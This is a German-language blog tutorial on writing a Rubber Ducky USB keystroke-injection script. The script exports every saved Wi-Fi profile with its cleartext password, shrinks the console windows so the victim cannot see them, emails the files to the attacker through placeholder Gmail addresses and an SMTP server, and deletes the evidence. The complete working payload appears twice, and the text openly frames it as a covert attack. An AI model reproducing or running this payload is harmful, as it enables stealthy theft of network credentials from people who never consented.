WLAN-Passwörter herausfinden mit dem Rubber Ducky!

Stellen Sie sich vor Sie stecken einen USB-Stick an ihren PC an und in binnen weniger Sekunden bekommen Sie eine E-Mail wo alle Passwörter enthalten sind. Hört sich zwar jetzt sehr kompliziert an aber das ist es wirklich nicht.

Was ist ein Rubber Ducky?

Das kann man sich vorstellen wie eine Tastatur halt nur in Form eines USB-Sticks. Das heißt alles was man den Rubber Ducky als Befehl eingibt kann er ausführen. Er öffnet zum Beispiel Programme, gibt Befehle in der CMD oder Powershell ein. Er kann alles was mach mit einer Tastatur auch eingeben kann. Im Herzen des Sticks befindet sich eine microSD-Karte, auf der man beliebige Tastenfolgen speichern kann, die dann beim Einstecken angespielt werden.

 

Wie muss ich vorgehen um alle WLAN-Passwörter auslesen zu können?

  • Wichtig ist das es sich hier um das fertige Script handelt also man kann es auch ohne Rubber-Ducky ausprobieren hier zu lässt man einfach STRING, DELAY, ENTER und so weg und gibt es nur so in seine CMD ein.
  • Es ist ganz einfach zu Beginn öffnet man mit dem Rubber Ducky eine CMD. Es wäre auch wünschenswert wenn man zuerst zum Desktop zurückkehrt das keine Programme mehr offen sind. Gut wäre es auch noch den Angriff unsichtbar zu machen so das der User der den USB-Stick einführt nicht erkennen kann welche Befehle ausgeführt werden.

 

DELAY 3000
WINDOWS d
DELAY 100
WINDOWS r
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
ENTER

  • Danach möchten wir das wir zum Desktop gelangen das alles was wir machen am Desktop gespeichert wird dabei wenden wir diesen Befehl an:

 

STRING cd "%USERPROFILE%\Desktop"
ENTER

 

 

  • Dort legen wir dann den Ordner WiFi_Passwords an
STRING md WiFi_Passwords
ENTER

 

 

  • Danach exportieren wir alles Profile mit den Passwörtern alles WLANs in diesen Ordner:
STRING netsh wlan export profile  folder="%USERPROFILE%\Desktop"\WiFi_Passwords\ key=clear
ENTER

 

  • Nachdem alle gespeichert wurden senden wir alles per E-Mail an uns. Diese Befehle gehen aber dann nur via Powershell. So öffnen wir diese und minimieren gleich dieses Fenster damit man nicht sehen kann was eingegeben wurde:
STRING powershell
ENTER
DELAY 200
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER

 

  • Jetzt kommen wir zu eines der Schwierigsten Punktendem versenden der E-Mail mit dem Inhalt der WLAN-Passwörter:
STRING  Send-MailMessage -To "Empfänger@gmail.com" -Subject "WLAN Passwort" -Body (Get-Content  WiFi_Passwords\*.xml | out-string) -SmtpServer "SMTP-Server" -From "Sender@gmail.com"
ENTER
DELAY 700

 

  • Hier einfach statt Empfänger@gmail.com, Sender@gmail.com und SMTP-Server deine E-Mail und deinen SMTP-Server hinzufügen.
  • Ich würde empfehlen immer kleine Delay zu benützen um den PC nicht zu überfordern.
  • Zu guter Letzt würde ich den Ordner löschen samt allen Dateien die enthalten sind:

 

STRING del WiFi_Passwords
ENTER
STRING J
ENTER
STRING rd  WiFi_Passwords & exit
ENTER

 

  • Nun das fertige Script zum Schluss:

DELAY 3000
WINDOWS d
DELAY 100
WINDOWS r
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
ENTER
DELAY 100
STRING cd "%USERPROFILE%\Desktop"
ENTER
STRING md WiFi_Passwords
ENTER
STRING netsh wlan export profile  folder="%USERPROFILE%\Desktop"\WiFi_Passwords\ key=clear
ENTER
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
STRING  Send-MailMessage -To "Empfänger@gmail.com" -Subject "WLAN Passwort" -Body (Get-Content  WiFi_Passwords\*.xml | out-string) -SmtpServer "SMTP-Server " -From "Sender@gmail.com"
ENTER
DELAY 700
STRING exit
ENTER
DELAY 100
STRING del WiFi_Passwords
ENTER
STRING J
ENTER
STRING rd  WiFi_Passwords & exit
ENTER

 

 

Kommentar verfassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.